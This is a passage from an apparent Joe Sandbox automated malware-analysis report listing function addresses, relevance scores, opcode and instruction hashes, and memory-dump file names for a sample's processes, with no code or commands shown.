                                                                                              • Opcode Fuzzy Hash: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction Fuzzy Hash: 64E04F20A4D7C44FCB0AAB3888695503FA0DF6B215B8A01DAC045CB1B3D51DDC49C711
                                                                                              Function 00007FFD9BAD42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8748f2229d9a10e94c6efc2157f07e6e16cd93f3582194c6cf9ecaf4c4e98379
                                                                                              • Instruction ID: d970297d9ea763ed99bcc6b45aaf724dccbfa35258043d9f1aa455cc997075f9
                                                                                              • Opcode Fuzzy Hash: 8748f2229d9a10e94c6efc2157f07e6e16cd93f3582194c6cf9ecaf4c4e98379
                                                                                              • Instruction Fuzzy Hash: A4F02270918A1CCFCF98DB48C495EE9B7F1FB68305F114599914AE7260CB31AA80CF85
                                                                                              Function 00007FFD9BAE4622 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction ID: 76b4888e6025a938afe51861bed46b7babfd62e827d48f24d27dbce629313bbb
                                                                                              • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                                              • Instruction Fuzzy Hash: 20E04F3270DC0E46FB75A75088705BF3696EBD0319B130339C02EC21B1DEBCA7028641
                                                                                              Function 00007FFD9BAD2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 80f32f3af981112524dfa9caf3547bb5af2cc3d6dc48dfb79d6b70ebd687c03b
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 4DE01230F0D11A46FBB49754D8617F962B0EBD4300F1121B8D50E933D1DD78AF81CA49
                                                                                              Function 00007FFD9BB0A050 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BB0D459 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction ID: 0adc029638af732f1c5008ccfe32db8d26f2a395cc251c8000867d32e9d1937a
                                                                                              • Opcode Fuzzy Hash: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction Fuzzy Hash: 3CE0BF6294B7C44FC74B973588A88947F60DE5721178A41EAC145CF6B3E92A8D49C711
                                                                                              Function 00007FFD9BB0A0E0 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BB07489 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction ID: f7022e37af43f2e05e986e1a0cc446726f3858d82e436fa8ced5b60d6f119fd7
                                                                                              • Opcode Fuzzy Hash: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction Fuzzy Hash: 46E01A2294E7C04FC70B973588A98547F60AE1721474A40EBC085CF1F3E9299949C711
                                                                                              Function 00007FFD9BB0D4D9 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction ID: c0e27e007c3273bfcd7392255f06bff471b2acec24bc275eef56d109f6faa75a
                                                                                              • Opcode Fuzzy Hash: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction Fuzzy Hash: FFE04F2194F7C04FC71B973488799547F60EF6721078A40EEC085CF5F3D9199949C702
                                                                                              Function 00007FFD9BB01C90 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                              Function 00007FFD9BB0B388 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction ID: a565302b9b7bcc34a1d7b6cb08a6a6e7b8abe4aeb70df905b6acc3b2f1e45e16
                                                                                              • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction Fuzzy Hash: B4D02230B518040FC70CA738885883433A0EB6A20A78140A8D00AC72F1D92AEC88C780
                                                                                              Function 00007FFD9BB06A90 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction ID: 3ca3d89b2a44c1ccc83115d2dd53154f4f74bb52458d03ecdb794458fcb23236
                                                                                              • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction Fuzzy Hash: 87D02230B548040FC70CA63A88588347390EB6A21A7C100A8D00AC72B5E92ADC88C740
                                                                                              Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: ee4550b84af7779471804bd44f4eca39960630772f8e243641bbcc622fd8accc
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 21C04C05F5B51F01F43577EE54760ACB5409BD5A10FD70372D50D840E19CED22D5815E
                                                                                              Function 00007FFD9BAD1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: ea4277a05fc08a7e60f9c3051bcf18043e5bf4e6c8f2dac607c17467776c4421
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: 0CC08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E259DDC2C740
                                                                                              Function 00007FFD9BAD4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 0878ed8e344642cdfa69e7fdeaa9ca7b4371213ce7a24820e0fcb3aa192dbb57
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: E0C08CA1E1820945E33487A048391AE73818F80220F928772805DA60A5EE6856429680
                                                                                              Function 00007FFD9BAD2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: de95d0a187b3515e693bdea705facc7c24591b6a477aa3fbbca702ebc35f4a95
                                                                                              • Instruction ID: 1d7a63e4e4e1b4690c252fdbb4c084cd5eaae4d9cb5184787ae2f4b152ae01ad
                                                                                              • Opcode Fuzzy Hash: de95d0a187b3515e693bdea705facc7c24591b6a477aa3fbbca702ebc35f4a95
                                                                                              • Instruction Fuzzy Hash: 15C04C02F1881A07F359671444355BE04835F9476DF5556B4E01E866DECD4C5A5106C7
                                                                                              Function 00007FFD9BAE685C Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9fc9b510e5af2865465a5d954c3616059f56a3536e8610c4992970c647d53807
                                                                                              • Instruction ID: f8da5a9e1362491898b231de9de4a04fc36088ee84a5f58fa30ab4ca55fedd3c
                                                                                              • Opcode Fuzzy Hash: 9fc9b510e5af2865465a5d954c3616059f56a3536e8610c4992970c647d53807
                                                                                              • Instruction Fuzzy Hash: EED0C930D045298FDBA0DB5488907A876B1AF48310F5001F6800CE3285CA356D80DB50
                                                                                              Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: a8191215b382f8a73f31a7feefe0008b463f6229fc6eb65d2ed8bfc4d80beb0f
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E5B01200E5740F00E43433FB08660A870409BC4100FC20270D40D8009198DD12944246

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction ID: ee9c509b4009dccb547055694a689a46b815e2793af6bde88379d6cda017ce85
                                                                                              • Opcode Fuzzy Hash: d7e52fd75661f17e29165b7474adbe63ab1d3a9785f96b054c9bf29c3b28f678
                                                                                              • Instruction Fuzzy Hash: E7419F02B0952605E23A73FD78228FD6B449FA927FB4847B7F45E8D0EB4D096085C2E5

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAC09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b7e1f3bd414272622ef30efaa4fb44251aa4db308e324b3064da2aa1319a506
                                                                                              • Instruction ID: 7116c722ae1cb457f665e80e6efc29b3e238c120036f68a33a9872f19d2d7dbd
                                                                                              • Opcode Fuzzy Hash: 2b7e1f3bd414272622ef30efaa4fb44251aa4db308e324b3064da2aa1319a506
                                                                                              • Instruction Fuzzy Hash: C7C2E331B1D91E4FEBA8EB5884A16B87392FFA8350F1546B9D01DC72D7CD74AD428B80
                                                                                              Function 00007FFD9BAE1000 Relevance: .4, Instructions: 400COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: efaf7b713a59b454c6ecf0f13d4395fd975a60023f3ae551137b14899b8f33a3
                                                                                              • Instruction ID: f78e213e7e62970d052404b307d27590bc7783c23af692cbe49d745ae1ab36cf
                                                                                              • Opcode Fuzzy Hash: efaf7b713a59b454c6ecf0f13d4395fd975a60023f3ae551137b14899b8f33a3
                                                                                              • Instruction Fuzzy Hash: 1DB1BE21B2D7AA0BE32D8B6C4C930B573C1EBA2309B15877DD8EBC3557D968E50786C1
                                                                                              Function 00007FFD9BAB0D78 Relevance: .3, Instructions: 258COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f83c88528afabffa76ae5492c01467d249c501599a9d69505e0ed8ffa78e54a
                                                                                              • Instruction ID: 7c1ad9131a820e4348e516dcb2f9fee67f358a037c99203bb81f9783c0a6a9f8
                                                                                              • Opcode Fuzzy Hash: 3f83c88528afabffa76ae5492c01467d249c501599a9d69505e0ed8ffa78e54a
                                                                                              • Instruction Fuzzy Hash: 9591E372A1CA994FE799DB6C88657A97FE0FF5A315F0001BED059CB2E6CBB81411CB40
                                                                                              Function 00007FFD9BADA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bad3000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [
                                                                                              • API String ID: 0-784033777
                                                                                              • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction ID: 121cfab53fffe1200d81b288f6f23bc6dcc44499ed8c237ca020838729594bf7
                                                                                              • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction Fuzzy Hash: 29116031A1CB588FDB64DF18C40526AB7E1FBD8711F12062ED589E3260CB74BA418B83
                                                                                              Function 00007FFD9BAE1B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 6729190563c793699f2709876fd472d6c102c96bdf37593a82ff87ef26b628e8
                                                                                              • Instruction ID: c3c8166cc8ce35ba9ea246946cfc85251d669881ba3feeffd9eab3f665aef506
                                                                                              • Opcode Fuzzy Hash: 6729190563c793699f2709876fd472d6c102c96bdf37593a82ff87ef26b628e8
                                                                                              • Instruction Fuzzy Hash: CA11BF2190F3C54FDB57973488289957FA0AF53615B0A81EED085CF0B3DAA9494AC712
                                                                                              Function 00007FFD9BAD57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAD3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bad3000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: f92c2e03af8315d20f22b607eb389bc65e56c28817b5bebaeca2c5d8a66d8e1e
                                                                                              • Instruction ID: a53fb3bc59086aa1cbeb698fceefa58c8270e058f321471587a8e2e543536901
                                                                                              • Opcode Fuzzy Hash: f92c2e03af8315d20f22b607eb389bc65e56c28817b5bebaeca2c5d8a66d8e1e
                                                                                              • Instruction Fuzzy Hash: 48E0923060A3C04FCB16AB7484688557FB0EF6720174A42EEC046CF1A3EB2DC886CB01
                                                                                              Function 00007FFD9BAE1BE9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: daa14b1b1fe6b87940ae803ebe151aa4124a9ce425c33ea5330d31e07c2931b5
                                                                                              • Instruction ID: 672f216df2e145084d8ed2e6e61345a624945d3cabc55d73f78e17a2d2ec7992
                                                                                              • Opcode Fuzzy Hash: daa14b1b1fe6b87940ae803ebe151aa4124a9ce425c33ea5330d31e07c2931b5
                                                                                              • Instruction Fuzzy Hash: 50E0656150E3C04FCB16D7344468455BF60AE6720174A42EEC046CF1A3EA1D8885C751
                                                                                              Function 00007FFD9BAEA039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: fc77b71306649ac121f6da7309ee235d1d94b737f89034b6293fe6679b281c5e
                                                                                              • Instruction ID: 7e111e58d5cb92f03ced50ff5448b266137747a3d81326ae1bbc13e43a7634a2
                                                                                              • Opcode Fuzzy Hash: fc77b71306649ac121f6da7309ee235d1d94b737f89034b6293fe6679b281c5e
                                                                                              • Instruction Fuzzy Hash: C0E06D6164E7C44FCB1AEA758869454BFA0EF6721174A42EFC046CF5A3EA2D9C85C701
                                                                                              Function 00007FFD9BAE2E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 880a5bb3ccad43c176025c2f3f1645aa7b95a3ee2577d8614110800fe738da65
                                                                                              • Instruction ID: b2df0a58e89c3cb5b562d03f480628781a7f2d5619dedeaced5311a7a69d803c
                                                                                              • Opcode Fuzzy Hash: 880a5bb3ccad43c176025c2f3f1645aa7b95a3ee2577d8614110800fe738da65
                                                                                              • Instruction Fuzzy Hash: BBE06D6164E7C44FCB1AEB748869454BFA1EF6720174A52EEC045CF1A7EA2D8889C701
                                                                                              Function 00007FFD9BAEA0C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 4992b30bab4fa2b01f79da745d65e0ac68848223867abdec24008fe2bad18a7b
                                                                                              • Instruction ID: 3fd5039c8f72130a96f5b5c94011bb82ce628db6bb629ad8363da0089da6a7df
                                                                                              • Opcode Fuzzy Hash: 4992b30bab4fa2b01f79da745d65e0ac68848223867abdec24008fe2bad18a7b
